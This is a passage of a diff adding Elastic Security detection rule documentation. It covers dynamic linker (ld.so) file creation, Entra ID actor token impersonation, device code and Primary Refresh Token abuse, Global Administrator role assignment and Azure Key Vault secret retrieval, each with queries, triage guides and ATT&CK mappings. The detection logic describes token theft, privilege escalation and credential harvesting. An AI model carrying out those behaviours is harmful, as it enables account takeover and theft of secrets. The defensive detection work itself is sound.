process.name field to ensure the process is not one of the benign processes listed in the exclusion criteria, such as "dockerd", "yum", "dnf", "microdnf", or "pacman". +- Investigate the file.path to confirm the location of the newly created ld.so file and verify if it matches any of the specified directories like "/lib", "/lib64", "/usr/lib", or "/usr/lib64". +- Analyze the parent process of the suspicious executable to determine if it was initiated by a legitimate or potentially malicious source. +- Look for any recent changes or anomalies in the system logs around the time of the file creation event to identify any related suspicious activities. +- Cross-reference the event with other security tools or logs, such as Elastic Defend or SentinelOne, to gather additional context or corroborating evidence of malicious activity. +- Assess the risk and impact of the event by considering the system's role and the potential consequences of a compromised dynamic linker on that system. + + +*False positive analysis* + + +- Package managers like yum, dnf, microdnf, and pacman can trigger false positives when they update or install packages that involve the dynamic linker. These processes are already excluded in the rule, but ensure any custom package managers or scripts are also considered for exclusion. +- Container management tools such as dockerd may create or modify ld.so files during container operations. If you use other container tools, consider adding them to the exclusion list to prevent false positives. +- System updates or maintenance scripts that involve library updates might create ld.so files. Review these scripts and add them to the exclusion list if they are verified as non-threatening. +- Custom administrative scripts or automation tools that interact with shared libraries could inadvertently trigger the rule. Identify these scripts and exclude them if they are part of regular, secure operations. +- Development environments where ld.so files are frequently created or modified during testing and compilation processes may need specific exclusions for development tools or environments to avoid false positives. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent further malicious activity and lateral movement. +- Verify the integrity of the dynamic linker (ld.so) on the affected system by comparing it with a known good version from a trusted source or repository. +- If the dynamic linker has been tampered with, replace it with the verified version and ensure all system binaries are intact. +- Conduct a thorough scan of the system using updated antivirus or endpoint detection tools to identify and remove any additional malicious files or processes. +- Review system logs and the process creation history to identify the source of the unauthorized ld.so creation and any associated malicious activity. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if other systems are affected. +- Implement additional monitoring and alerting for similar suspicious activities, such as unauthorized file creations in critical system directories, to enhance future detection capabilities. + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.type == "creation" and process.executable != null and +file.path like~ ("/lib/ld-linux*.so*", "/lib64/ld-linux*.so*", "/usr/lib/ld-linux*.so*", "/usr/lib64/ld-linux*.so*") and +not process.executable in ( + "/bin/dpkg", "/usr/bin/dpkg", "/bin/dockerd", "/usr/bin/dockerd", "/usr/sbin/dockerd", "/bin/microdnf", + "/usr/bin/microdnf", "/bin/rpm", "/usr/bin/rpm", "/bin/snapd", "/usr/bin/snapd", "/bin/yum", "/usr/bin/yum", + "/bin/dnf", "/usr/bin/dnf", "/bin/podman", "/usr/bin/podman", "/bin/dnf-automatic", "/usr/bin/dnf-automatic", + "/bin/pacman", "/usr/bin/pacman", "/usr/bin/dpkg-divert", "/bin/dpkg-divert", "/sbin/apk", "/usr/sbin/apk", + "/usr/local/sbin/apk", "/usr/bin/apt", "/usr/sbin/pacman", "/bin/podman", "/usr/bin/podman", "/usr/bin/puppet", + "/bin/puppet", "/opt/puppetlabs/puppet/bin/puppet", "/usr/bin/chef-client", "/bin/chef-client", + "/bin/autossl_check", "/usr/bin/autossl_check", "/proc/self/exe", "/dev/fd/*", "/usr/bin/pamac-daemon", + "/bin/pamac-daemon", "/usr/lib/snapd/snapd", "/usr/local/bin/dockerd", "/usr/libexec/platform-python", + "/usr/lib/snapd/snap-update-ns", "./usr/bin/podman", "/usr/bin/crio", "/usr/bin/buildah", "/bin/dnf5", + "/usr/bin/dnf5", "/usr/bin/pamac" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: Dynamic Linker Hijacking +** ID: T1574.006 +** Reference URL: https://attack.mitre.org/techniques/T1574/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-entra-id-actor-token-user-impersonation-abuse.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-entra-id-actor-token-user-impersonation-abuse.asciidoc new file mode 100644 index 0000000000..a7ce074aa1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-entra-id-actor-token-user-impersonation-abuse.asciidoc @@ -0,0 +1,141 @@ +[[prebuilt-rule-8-19-8-entra-id-actor-token-user-impersonation-abuse]] +=== Entra ID Actor Token User Impersonation Abuse + +Identifies potential abuse of actor tokens in Microsoft Entra ID audit logs. Actor tokens are undocumented backend mechanisms used by Microsoft for service-to-service (S2S) operations, allowing services to perform actions on behalf of users. These tokens appear in logs with the service's display name but the impersonated user's UPN. While some legitimate Microsoft operations use actor tokens, unexpected usage may indicate exploitation of CVE-2025-55241, which allowed unauthorized access to Azure AD Graph API across tenants before being patched by Microsoft. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 8m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://dirkjanm.io/obtaining-global-admin-in-every-entra-id-tenant-with-actor-tokens/ +* https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-55241 + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Data Source: Azure +* Data Source: Entra ID +* Data Source: Entra Audit Logs +* Use Case: Identity and Access Audit +* Use Case: Threat Detection +* Tactic: Initial Access +* Tactic: Privilege Escalation +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Entra ID Actor Token User Impersonation Abuse* + + +This rule detects when Microsoft services use actor tokens to perform operations in audit logs. Actor tokens are undocumented backend mechanisms used by Microsoft for service-to-service (S2S) communication. They appear with a mismatch: the service's display name but the impersonated user's UPN. While some operations legitimately use actor tokens, unexpected usage may indicate exploitation of CVE-2025-55241, which allowed attackers to obtain Global Admin privileges across any Entra ID tenant. Note that this vulnerability has been patched by Microsoft as of September 2025. + + +*Possible investigation steps* + + +- Review the `azure.auditlogs.properties.initiated_by.user.userPrincipalName` field to identify which service principals are exhibiting this behavior. +- Check the `azure.auditlogs.properties.initiated_by.user.displayName` to confirm these are legitimate Microsoft services. +- Analyze the actions performed by these service principals - look for privilege escalations, permission grants, or unusual administrative operations. +- Review the timing and frequency of these events to identify potential attack patterns or automated exploitation. +- Cross-reference with recent administrative changes or service configurations that might explain legitimate use cases. +- Check if any new applications or service principals were registered recently that could be related to this activity. +- Investigate any correlation with other suspicious authentication events or privilege escalation attempts in your tenant. + + +*False positive analysis* + + +- Legitimate Microsoft service migrations or updates may temporarily exhibit this behavior. +- Third-party integrations using Microsoft Graph or other APIs might trigger this pattern during normal operations. +- Automated administrative tools or scripts using service principal authentication could be misconfigured. + + +*Response and remediation* + + +- Immediately review and audit all service principal permissions and recent consent grants in your Entra ID tenant. +- Disable or restrict any suspicious service principals exhibiting this behavior until verified. +- Review and revoke any unnecessary application permissions, especially those with high privileges. +- Enable and review Entra ID audit logs for any permission grants or role assignments made by these service principals. +- Implement Conditional Access policies to restrict service principal authentication from unexpected locations or conditions. +- Enable Entra ID Identity Protection to detect and respond to risky service principal behaviors. +- Review and harden application consent policies to prevent unauthorized service principal registrations. +- Consider implementing privileged identity management (PIM) for service principal role assignments. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-azure.auditlogs-* metadata _id, _version, _index +| where azure.auditlogs.properties.initiated_by.user.displayName in ( + "Office 365 Exchange Online", + "Skype for Business Online", + "Dataverse", + "Office 365 SharePoint Online", + "Microsoft Dynamics ERP" + ) and + not azure.auditlogs.operation_name like "*group*" and + azure.auditlogs.operation_name != "Set directory feature on tenant" + and azure.auditlogs.properties.initiated_by.user.userPrincipalName rlike ".+@[A-Za-z0-9.]+\\.[A-Za-z]{2,}" +| keep + _id, + @timestamp, + azure.*, + client.*, + event.*, + source.* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Abuse Elevation Control Mechanism +** ID: T1548 +** Reference URL: https://attack.mitre.org/techniques/T1548/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-entra-id-device-code-auth-with-broker-client.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-entra-id-device-code-auth-with-broker-client.asciidoc new file mode 100644 index 0000000000..5e6d08682a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-entra-id-device-code-auth-with-broker-client.asciidoc @@ -0,0 +1,150 @@ +[[prebuilt-rule-8-19-8-entra-id-device-code-auth-with-broker-client]] +=== Entra ID Device Code Auth with Broker Client + +Identifies device code authentication with an Azure broker client for Entra ID. Adversaries abuse Primary Refresh Tokens (PRTs) to bypass multi-factor authentication (MFA) and gain unauthorized access to Azure resources. PRTs are used in Conditional Access policies to enforce device-based controls. Compromising PRTs allows attackers to bypass these policies and gain unauthorized access. This rule detects successful sign-ins using device code authentication with the Entra ID broker client application ID (29d9ed98-a469-4536-ade2-f981bc1d605e). + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-azure.signinlogs-* +* logs-azure.activitylogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://dirkjanm.io/assets/raw/Phishing%20the%20Phishing%20Resistant.pdf +* https://learn.microsoft.com/en-us/troubleshoot/azure/entra/entra-id/governance/verify-first-party-apps-sign-in +* https://learn.microsoft.com/en-us/azure/azure-monitor/reference/tables/signinlogs + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Use Case: Identity and Access Audit +* Tactic: Initial Access +* Resources: Investigation Guide + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Entra ID Device Code Auth with Broker Client* + + +Entra ID Device Code Authentication allows users to authenticate devices using a code, facilitating seamless access to Azure resources. Adversaries exploit this by compromising Primary Refresh Tokens (PRTs) to bypass multi-factor authentication and Conditional Access policies. The detection rule identifies unauthorized access attempts by monitoring successful sign-ins using device code authentication linked to a specific broker client application ID, flagging potential misuse. + + +*Possible investigation steps* + + +- Review the sign-in logs to confirm the use of device code authentication by checking the field azure.signinlogs.properties.authentication_protocol for the value deviceCode. +- Verify the application ID involved in the sign-in attempt by examining azure.signinlogs.properties.conditional_access_audiences.application_id and ensure it matches 29d9ed98-a469-4536-ade2-f981bc1d605e. +- Investigate the user account associated with the successful sign-in to determine if the activity aligns with expected behavior or if it appears suspicious. +- Check for any recent changes or anomalies in the user's account settings or permissions that could indicate compromise. +- Review the history of sign-ins for the user to identify any patterns or unusual access times that could suggest unauthorized access. +- Assess the device from which the sign-in was attempted to ensure it is a recognized and authorized device for the user. + + +*False positive analysis* + + +- Legitimate device code authentication by trusted applications or users may trigger the rule. Review the application ID and user context to confirm legitimacy. +- Frequent access by automated scripts or services using device code authentication can be mistaken for unauthorized access. Identify and document these services, then create exceptions for known application IDs. +- Shared devices in environments with multiple users may cause false positives if device code authentication is used regularly. Implement user-specific logging to differentiate between legitimate and suspicious activities. +- Regular maintenance or updates by IT teams using device code authentication might be flagged. Coordinate with IT to schedule these activities and temporarily adjust monitoring rules if necessary. +- Ensure that any exceptions or exclusions are regularly reviewed and updated to reflect changes in the environment or application usage patterns. + + +*Response and remediation* + + +- Immediately revoke the compromised Primary Refresh Tokens (PRTs) to prevent further unauthorized access. This can be done through the Azure portal by navigating to the user's account and invalidating all active sessions. +- Enforce a password reset for the affected user accounts to ensure that any credentials potentially compromised during the attack are no longer valid. +- Implement additional Conditional Access policies that require device compliance checks and restrict access to trusted locations or devices only, to mitigate the risk of future PRT abuse. +- Conduct a thorough review of the affected accounts' recent activity logs to identify any unauthorized actions or data access that may have occurred during the compromise. +- Escalate the incident to the security operations team for further investigation and to determine if there are any broader implications or additional compromised accounts. +- Enhance monitoring by configuring alerts for unusual sign-in patterns or device code authentication attempts from unexpected locations or devices, to improve early detection of similar threats. +- Coordinate with the incident response team to perform a post-incident analysis and update the incident response plan with lessons learned from this event. + +==== Setup + + +This rule optionally requires Azure Sign-In logs from the Azure integration. Ensure that the Azure integration is correctly set up and that the required data is being collected. + + +==== Rule query + + +[source, js] +---------------------------------- + event.dataset:(azure.activitylogs or azure.signinlogs) + and azure.signinlogs.properties.authentication_protocol:deviceCode + and azure.signinlogs.properties.conditional_access_audiences.application_id:29d9ed98-a469-4536-ade2-f981bc1d605e + and event.outcome:success or ( + azure.activitylogs.properties.appId:29d9ed98-a469-4536-ade2-f981bc1d605e + and azure.activitylogs.properties.authentication_protocol:deviceCode) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Use Alternate Authentication Material +** ID: T1550 +** Reference URL: https://attack.mitre.org/techniques/T1550/ +* Sub-technique: +** Name: Application Access Token +** ID: T1550.001 +** Reference URL: https://attack.mitre.org/techniques/T1550/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-entra-id-global-administrator-role-assigned.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-entra-id-global-administrator-role-assigned.asciidoc new file mode 100644 index 0000000000..249363ec42 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-entra-id-global-administrator-role-assigned.asciidoc @@ -0,0 +1,122 @@ +[[prebuilt-rule-8-19-8-entra-id-global-administrator-role-assigned]] +=== Entra ID Global Administrator Role Assigned + +In Microsoft Entra ID, permissions to manage resources are assigned using roles. The Global Administrator is a role that enables users to have access to all administrative features in Microsoft Entra ID and services that use Microsoft Entra ID identities like the Microsoft 365 Defender portal, the Microsoft 365 compliance center, Exchange, SharePoint Online, and Skype for Business Online. Attackers can add users as Global Administrators to maintain access and manage all subscriptions and their settings and resources. They can also elevate privilege to User Access Administrator to pivot into Azure resources. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-azure.auditlogs-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://securitylabs.datadoghq.com/articles/i-spy-escalating-to-entra-id-global-admin/ +* https://docs.microsoft.com/en-us/azure/active-directory/roles/permissions-reference#global-administrator +* https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/ + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Audit Logs +* Use Case: Identity and Access Audit +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Entra ID Global Administrator Role Assigned* + + +Microsoft Entra ID's Global Administrator role grants comprehensive access to manage Microsoft Entra ID and associated services. Adversaries may exploit this by assigning themselves or others to this role, ensuring persistent control over resources. The detection rule identifies such unauthorized assignments by monitoring specific audit logs for role changes, focusing on the addition of members to the Global Administrator role, thus helping to mitigate potential security breaches. + + +*Possible investigation steps* + + +- Review the Microsoft Entra ID audit logs to identify the user account that performed the "Add member to role" operation, focusing on the specific event dataset and operation name. +- Verify the identity of the user added to the Global Administrator role by examining the modified properties in the audit logs, specifically the new_value field indicating "Global Administrator". +- Check the history of role assignments for the identified user to determine if this is a recurring pattern or a one-time event. +- Investigate the source IP address and location associated with the role assignment event to assess if it aligns with expected user behavior or if it indicates potential unauthorized access. +- Review any recent changes or activities performed by the newly assigned Global Administrator to identify any suspicious actions or configurations that may have been altered. +- Consult with the organization's IT or security team to confirm if the role assignment was authorized and aligns with current administrative needs or projects. +- Correlate with Microsoft Entra ID sign-in logs to check for any unusual login patterns or failed login attempts associated with the user who assigned the role. +- Review the reported device to determine if it is a known and trusted device or if it raises any security concerns such as unexpected relationships with the source user. + + +*False positive analysis* + + +- Routine administrative tasks may trigger alerts when legitimate IT staff are assigned the Global Administrator role temporarily for maintenance or configuration purposes. To manage this, create exceptions for known IT personnel or scheduled maintenance windows. +- Automated scripts or third-party applications that require elevated permissions might be flagged if they are configured to add users to the Global Administrator role. Review and whitelist these scripts or applications if they are verified as safe and necessary for operations. +- Organizational changes, such as mergers or restructuring, can lead to legitimate role assignments that appear suspicious. Implement a review process to verify these changes and exclude them from triggering alerts if they align with documented organizational changes. +- Training or onboarding sessions for new IT staff might involve temporary assignment to the Global Administrator role. Establish a protocol to document and exclude these training-related assignments from detection alerts. + + +*Response and remediation* + + +- Immediately remove any unauthorized users from the Global Administrator role to prevent further unauthorized access and control over Azure AD resources. +- Conduct a thorough review of recent audit logs to identify any additional unauthorized changes or suspicious activities associated with the compromised account or role assignments. +- Reset the credentials of the affected accounts and enforce multi-factor authentication (MFA) to enhance security and prevent further unauthorized access. +- Notify the security operations team and relevant stakeholders about the incident for awareness and further investigation. +- Implement conditional access policies to restrict Global Administrator role assignments to specific, trusted locations or devices. +- Review and update role assignment policies to ensure that only a limited number of trusted personnel have the ability to assign Global Administrator roles. +- Enhance monitoring and alerting mechanisms to detect similar unauthorized role assignments in the future, ensuring timely response to potential threats. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.auditlogs and + azure.auditlogs.properties.category:RoleManagement and + azure.auditlogs.operation_name:"Add member to role" and + azure.auditlogs.properties.target_resources.*.modified_properties.*.new_value: "\"Global Administrator\"" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-entra-id-rt-to-prt-transition-from-same-user-and-device.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-entra-id-rt-to-prt-transition-from-same-user-and-device.asciidoc new file mode 100644 index 0000000000..7c477df21a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-entra-id-rt-to-prt-transition-from-same-user-and-device.asciidoc @@ -0,0 +1,148 @@ +[[prebuilt-rule-8-19-8-entra-id-rt-to-prt-transition-from-same-user-and-device]] +=== Entra ID RT to PRT Transition from Same User and Device + +Identifies when a user signs in with a refresh token using the Microsoft Authentication Broker (MAB) client, followed by a Primary Refresh Token (PRT) sign-in from the same device within 1 hour. This pattern may indicate that an attacker has successfully registered a device using ROADtx and transitioned from short-term token access to long-term persistent access via PRTs. Excluding access to the Device Registration Service (DRS) ensures the PRT is being used beyond registration, often to access Microsoft 365 resources like Outlook or SharePoint. + +*Rule type*: eql + +*Rule indices*: + +* filebeat-* +* logs-azure.signinlogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 30m + +*Searches indices from*: now-60m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/ +* https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/ + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Use Case: Threat Detection +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Sign-In Logs +* Tactic: Persistence +* Tactic: Initial Access +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Entra ID RT to PRT Transition from Same User and Device* + + +This rule identifies a sequence where a Microsoft Entra ID user signs in using a refresh token issued to the Microsoft Authentication Broker (MAB), followed by a sign-in using a Primary Refresh Token (PRT) from the same device. This behavior is uncommon for normal user activity and strongly suggests adversarial behavior, particularly when paired with OAuth phishing and device registration tools like ROADtx. The use of PRT shortly after a refresh token sign-in typically indicates the attacker has obtained device trust and is now using the PRT to impersonate a fully compliant user+device pair. + + +*Possible investigation steps* + +- Identify the user principal and device from `azure.signinlogs.properties.user_principal_name` and `azure.signinlogs.properties.device_detail.device_id`. +- Confirm the first sign-in event came from the Microsoft Auth Broker (`app_id`) with `incoming_token_type: refreshToken`. +- Ensure the device has a `trust_type` of "Azure AD joined" and that the `sign_in_session_status` is "unbound". +- Confirm the second sign-in used `incoming_token_type: primaryRefreshToken` and that the `resource_display_name` is not "Device Registration Service". +- Investigate any Microsoft Graph, Outlook, or SharePoint access occurring shortly after. +- Review conditional access policy outcomes and determine whether MFA or device compliance was bypassed. + + +*False positive analysis* + +- Legitimate device onboarding and sign-ins using hybrid-joined endpoints may trigger this rule. +- Rapid device provisioning in enterprise environments using MAB could generate similar token behavior. +- Use supporting signals, such as IP address changes, geolocation, or user agent anomalies, to reduce noise. + + +*Response and remediation* + +- Investigate other sign-in patterns and assess whether token abuse has occurred. +- Revoke PRT sessions via Microsoft Entra ID or Conditional Access. +- Remove or quarantine the suspicious device registration. +- Require password reset and enforce MFA. +- Audit and tighten device trust and conditional access configurations. + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by azure.signinlogs.properties.user_id, azure.signinlogs.properties.device_detail.device_id with maxspan=1h + [authentication where + event.dataset == "azure.signinlogs" and + azure.signinlogs.category == "NonInteractiveUserSignInLogs" and + azure.signinlogs.properties.app_id == "29d9ed98-a469-4536-ade2-f981bc1d605e" and + azure.signinlogs.properties.incoming_token_type == "refreshToken" and + azure.signinlogs.properties.device_detail.trust_type == "Azure AD joined" and + azure.signinlogs.properties.device_detail.device_id != null and + azure.signinlogs.properties.token_protection_status_details.sign_in_session_status == "unbound" and + azure.signinlogs.properties.user_type == "Member" and + azure.signinlogs.result_signature == "SUCCESS" + ] + [authentication where + event.dataset == "azure.signinlogs" and + azure.signinlogs.properties.incoming_token_type == "primaryRefreshToken" and + azure.signinlogs.properties.resource_display_name != "Device Registration Service" and + azure.signinlogs.result_signature == "SUCCESS" + ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Device Registration +** ID: T1098.005 +** Reference URL: https://attack.mitre.org/techniques/T1098/005/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-excessive-secret-or-key-retrieval-from-azure-key-vault.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-excessive-secret-or-key-retrieval-from-azure-key-vault.asciidoc new file mode 100644 index 0000000000..aceed24bea --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-excessive-secret-or-key-retrieval-from-azure-key-vault.asciidoc @@ -0,0 +1,206 @@ +[[prebuilt-rule-8-19-8-excessive-secret-or-key-retrieval-from-azure-key-vault]] +=== Excessive Secret or Key Retrieval from Azure Key Vault + +Identifies excessive secret or key retrieval operations from Azure Key Vault. This rule detects when a user principal retrieves secrets or keys from Azure Key Vault multiple times within a short time frame, which may indicate potential abuse or unauthorized access attempts. The rule focuses on high-frequency retrieval operations that deviate from normal user behavior, suggesting possible credential harvesting or misuse of sensitive information. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 43 + +*Runs every*: 8m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.inversecos.com/2022/05/detection-and-compromise-azure-key.html + +*Tags*: + +* Domain: Cloud +* Domain: Storage +* Domain: Identity +* Data Source: Azure +* Data Source: Azure Platform Logs +* Data Source: Azure Key Vault +* Use Case: Threat Detection +* Use Case: Identity and Access Audit +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Excessive Secret or Key Retrieval from Azure Key Vault* + + +Azure Key Vault is a cloud service that safeguards encryption keys and secrets like certificates, connection strings, and passwords. It is crucial for managing sensitive data in Azure environments. Unauthorized modifications to Key Vaults can lead to data breaches or service disruptions. This rule detects excessive secret or key retrieval operations from Azure Key Vault, which may indicate potential abuse or unauthorized access attempts. + + +*Possible investigation steps* + +- Review the `azure.platformlogs.identity.claim.upn` field to identify the user principal making the retrieval requests. This can help determine if the activity is legitimate or suspicious. +- Check the `azure.platformlogs.identity.claim.appid` or `azure.platformlogs.identity.claim.appid_display_name` to identify the application or service making the requests. If the application is not recognized or authorized, it may indicate a potential security incident. It is plausible that the application is a FOCI compliant application, which are commonly abused by adversaries to evade security controls or conditional access policies. +- Analyze the `azure.platformlogs.resource.name` field to determine which Key Vault is being accessed. This can help assess the impact of the retrieval operations and whether they target sensitive resources. +- Review the `event.action` field to confirm the specific actions being performed, such as `KeyGet`, `SecretGet`, or `CertificateGet`. These actions 